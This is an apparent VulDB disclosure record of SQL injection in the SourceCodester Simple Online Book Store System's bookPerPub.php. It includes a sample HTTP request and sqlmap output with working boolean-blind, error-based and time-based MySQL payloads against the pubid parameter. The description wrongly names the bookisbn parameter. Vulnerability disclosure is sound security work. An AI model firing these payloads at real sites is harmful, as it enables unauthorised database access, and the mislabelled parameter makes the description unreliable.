| 제목 | SourceCodester Simple Online Book Store System bookPerPub.php SQL injection |
|---|
| 설명 | SQL injection exists in the bookisbn parameter of /obs/bookPerPub.ph. Attackers can insert malicious statements to disambiguate SQL queries
request:
GET /obs/bookPerPub.php?pubid=1 HTTP/1.1
Host: 192.168.0.18:8081
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.0.18:8081/obs/publisher_list.php
Cookie: PHPSESSID=g7kjmvh3bfv7hdval8mjn5kcnj
Upgrade-Insecure-Requests: 1
sqlmap response:
sqlmap identified the following injection point(s) with a total of 268 HTTP(s) requests:
---
Parameter: pubid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pubid=1' AND 9164=9164 AND 'iJqw'='iJqw
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: pubid=1' AND GTID_SUBSET(CONCAT(0x71766b7671,(SELECT (ELT(6276=6276,1))),0x716a7a7a71),6276) AND 'HPPE'='HPPE
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: pubid=1' AND (SELECT 4191 FROM (SELECT(SLEEP(5)))tMuD) AND 'QwlA'='QwlA
--- |
|---|
| 원천 | ⚠️ https:// www.sourcecodester.com/php/15423/simple-online-book-store-system-php-free-source-code.html |
|---|
| 사용자 | weicheng (UID 30823) |
|---|
| 제출 | 2022. 08. 10. PM 03:25 (4 연령 ago) |
|---|
| 모더레이션 | 2022. 08. 11. AM 11:10 (20 hours later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 206167 [SourceCodester Simple Online Book Store System /obs/bookPerPub.php bookisbn SQL 주입] |
|---|
| 포인트들 | 20 |
|---|